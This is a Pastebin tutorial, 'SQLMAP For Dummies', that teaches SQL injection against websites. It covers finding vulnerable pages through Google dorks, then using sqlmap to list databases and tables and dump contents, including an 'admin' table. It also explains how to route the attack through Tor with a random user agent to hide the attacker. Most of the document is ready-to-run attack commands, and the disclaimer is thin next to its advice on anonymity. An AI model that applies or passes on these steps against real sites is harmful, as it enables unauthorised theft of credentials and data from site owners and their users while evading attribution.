Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- This tutorial is for educational purposes only. This information is not intended to aid in any form of illegal activity.
- SQLMAP For Dummies v1.0 - By Matrix -
- http://www.twitter.com/TheAnonMatrix
- Required for use: Backtrack5 R1.
- Start your Backtrack5 R1 (BT5) and start sqlmap, it can be found in /pentest/database/sqlmap/.
- Now lets get started!
- First we need a webpage, this normally is done by hand or by using dorks in google. To find out if a page is vulnerable to an injection we do this:
- http://localhost.com/index.php?id=1337'
- Notice the ' here: ^
- This should give you a pretty error and a good start!
- Lets open sqlmap!
- So the first you need to learn is options, or settings you have to apply in sqlmap. The base is:
- python sqlmap.py -u <website>
- With a website we would simply do it like this
- python sqlmap.py -u http://localhost/index.php?id=1337
- (note we did not add the ' here)
- -u stands for Url and tells sqlmap THIS is our url. But we have to add more options for sqlmap to work:
- (note the following options use double dashes)
- --dbs to find DataBases
- --users to find users.
- python sqlmap.py -u http://localhost/index.php?id=1337 --dbs (and/or) --users
- (for the sake of lenght we will be assuming you used --dbs in this tutorial)
- After this command is ran you should come up with 0 results, or some results. If you read the text you might be able to find some databases, and if you do. Congratz!
- Should look like this:
- available databases [2]:
- [*] database1
- [*] database2
- Now to the fun part!
- python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1
- This tells the program to find tables (--tables) in database (-D) names: database1.
- Once you execute this you will find (maybe) tons of tables. Locate the one you want...lets call it admin!
- python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin
- Now you should see the info of the table admin. But now we should be able to dump it! This can be done by --dump or --dump-all.
- Examples:
- python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1 --dump-all
- python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump
- --dump dumps the selected tables content, --dump-all dumps EVERYTHING!
- But, we should be secure?
- Tor with SQLMAP:
- First find /etc/apt/sources.list open it and add
- deb http://deb.torproject.org/torproject.org lucid main
- Open the terminal and use this commandoes:
- gpg --keyserver keys.gnupg.net --recv 886DDD89
- gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
- And now we need more commandos ran as root:
- apt-get update
- apt-get install tor tor-geoipdb
- apt-get install polipo
- Start tor: /etc/init.d/tor start grab the copy of this config file: https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf
- Go to /etc/polipoconfig and replce the file with the one above. restart polipo: /etc/init.d/polipo restart
- Congratz! now you can run sqlmap with TOR!
- python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump --tor --random-agent
- Happy safe hacking! ... and
- I hope you found this tutorial helpful. We encourage you to experience other tutorials and get the best possible education you can.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement